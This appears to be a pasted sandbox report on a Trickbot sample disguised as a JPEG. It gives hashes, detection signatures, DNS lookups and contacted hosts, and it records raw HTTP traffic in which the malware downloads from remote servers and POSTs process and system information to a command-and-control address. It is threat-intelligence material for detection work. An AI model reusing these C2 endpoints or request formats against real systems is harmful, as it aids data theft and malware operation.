Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * ID: 1483
- * MalFamily: "Ptsecurity"
- * MalScore: 10.0
- * File Name: "Trickbot_91775a72b3877ffa24785d81d77ea9a7.jpg"
- * File Size: 19456
- * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
- * SHA256: "7ead351f7fe75c4d623d8cec8929516928b6b138b3b6150949ea2ec031ab47ac"
- * MD5: "91775a72b3877ffa24785d81d77ea9a7"
- * SHA1: "dd34ac62db9476b4a319391bf75fe8114b4101b7"
- * SHA512: "1c247c7f3782923efc7b1c067f269ac2e84f276e2f2ac86377b9f0d8d203e6b28dc4e22a0d0e3f23f585f8cc2d4ec00a6945569ccc9b1fa05f0ace817ed68d0a"
- * CRC32: "008D7BA2"
- * SSDEEP: "384:9VfD8hT4IPLax88G0fXvNY0w1YZbDkat:8hTxPmx9vuP1ObDk0"
- * Process Execution:
- * Executed Commands:
- * Signatures Detected:
- "Description": "File has been identified by 4 Antiviruses on VirusTotal as malicious",
- "Details":
- "Endgame": "malicious (high confidence)"
- "FireEye": "Generic.mg.91775a72b3877ffa"
- "SentinelOne": "DFI - Malicious PE"
- "CrowdStrike": "win/malicious_confidence_80% (D)"
- "Description": "Multiple direct IP connections",
- "Details":
- "direct_ip_connections": "Made direct connections to 7 unique IP addresses"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request_iocs": "http://69.16.254.181/JdNG9d"
- "suspicious_request_iocs": "http://hrpm.ca/images/result.php"
- "suspicious_request_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/90"
- "suspicious_request_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/83/"
- "Description": "Performs some HTTP requests",
- "Details":
- "url_iocs": "http://69.16.254.181/JdNG9d"
- "url_iocs": "http://hrpm.ca/images/result.php"
- "url_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/90"
- "url_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/83/"
- "Description": "Looks up the external IP address",
- "Details":
- "domain": "api.ipify.org"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)"
- "signature": "ET CNC Feodo Tracker Reported CnC Server group 21"
- "signature": "ET CNC Feodo Tracker Reported CnC Server group 2"
- "signature": "ET CNC Feodo Tracker Reported CnC Server group 4"
- "signature": "ET TROJAN PTsecurity Trickbot Data Exfiltration"
- * Started Service:
- * Mutexes:
- * Modified Files:
- * Deleted Files:
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "hrpm.ca",
- "answers":
- "data": "162.208.2.182",
- "type": "A"
- "type": "A",
- "request": "api.ipify.org",
- "answers":
- "data": "54.225.92.64",
- "type": "A"
- "data": "23.23.83.153",
- "type": "A"
- "data": "54.243.198.12",
- "type": "A"
- "data": "nagano-19599.herokussl.com",
- "type": "CNAME"
- "data": "23.21.121.219",
- "type": "A"
- "data": "23.23.243.154",
- "type": "A"
- "data": "23.23.229.94",
- "type": "A"
- "data": "23.23.73.124",
- "type": "A"
- "data": "elb097307-934924932.us-east-1.elb.amazonaws.com",
- "type": "CNAME"
- "data": "50.19.218.16",
- "type": "A"
- "type": "A",
- "request": "bx56k5gep4jz7k4x.onion",
- "answers":
- "data": "",
- "type": "NXDOMAIN"
- "type": "A",
- "request": "238.175.207.91.zen.spamhaus.org",
- "answers":
- "type": "A",
- "request": "238.175.207.91.cbl.abuseat.org",
- "answers":
- "data": "127.0.0.2",
- "type": "A"
- * Domains:
- "ip": "",
- "domain": "bx56k5gep4jz7k4x.onion"
- "ip": "54.225.92.64",
- "domain": "api.ipify.org"
- "ip": "162.208.2.182",
- "domain": "hrpm.ca"
- "ip": "127.0.0.4",
- "domain": "238.175.207.91.zen.spamhaus.org"
- "ip": "127.0.0.2",
- "domain": "238.175.207.91.cbl.abuseat.org"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://69.16.254.181/JdNG9d",
- "user-agent": "OnkyoblasterOS X-f5.99",
- "method": "GET",
- "host": "69.16.254.181",
- "version": "1.1",
- "path": "/JdNG9d",
- "data": "GET /JdNG9d HTTP/1.1\r\nUser-Agent: OnkyoblasterOS X-f5.99\r\nHost: 69.16.254.181\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://hrpm.ca/images/result.php",
- "user-agent": "OnkyoblasterOS X-f5.99",
- "method": "GET",
- "host": "hrpm.ca",
- "version": "1.1",
- "path": "/images/result.php",
- "data": "GET /images/result.php HTTP/1.1\r\nUser-Agent: OnkyoblasterOS X-f5.99\r\nHost: hrpm.ca\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\nEmpty\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n--Arasfjasu7--\r\n\r\n",
- "uri": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/90",
- "user-agent": "test",
- "method": "POST",
- "host": "170.238.117.187:8082",
- "version": "1.1",
- "path": "/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/90",
- "data": "POST /wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/90 HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=Arasfjasu7\r\nUser-Agent: test\r\nHost: 170.238.117.187:8082\r\nContent-Length: 154\r\nCache-Control: no-cache\r\n\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\nEmpty\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n--Arasfjasu7--\r\n\r\n",
- "port": 8082
- "count": 1,
- "body": "",
- "uri": "http://170.238.117.187:8082/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/83/",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "POST",
- "host": "170.238.117.187",
- "version": "1.1",
- "path": "/wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/83/",
- "data": "POST /wmd14/Host_W617601.557B9DE766197733FF717FEDDF1F3D5D/83/ HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 170.238.117.187\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=---------ATPZKATPHMMRMNRX\r\nContent-Length: 286\r\n\r\n",
- "port": 8082
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "Bulgaria",
- "ip": "79.124.49.206",
- "inaddrarpa": "",
- "hostname": ""
- "country_name": "United States",
- "ip": "69.16.254.181",
- "inaddrarpa": "",
- "hostname": ""
- "country_name": "United States",
- "ip": "54.243.198.12",
- "inaddrarpa": "",
- "hostname": "api.ipify.org"
- "country_name": "United States",
- "ip": "23.94.24.196",
- "inaddrarpa": "",
- "hostname": ""
- "country_name": "Netherlands",
- "ip": "185.141.27.223",
- "inaddrarpa": "",
- "hostname": ""
- "country_name": "France",
- "ip": "178.33.26.175",
- "inaddrarpa": "",
- "hostname": ""
- "country_name": "Brazil",
- "ip": "170.238.117.187",
- "inaddrarpa": "",
- "hostname": ""
- "country_name": "United States",
- "ip": "162.208.2.182",
- "inaddrarpa": "",
- "hostname": "hrpm.ca"
- "country_name": "United States",
- "ip": "107.173.160.19",
- "inaddrarpa": "",
- "hostname": ""
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement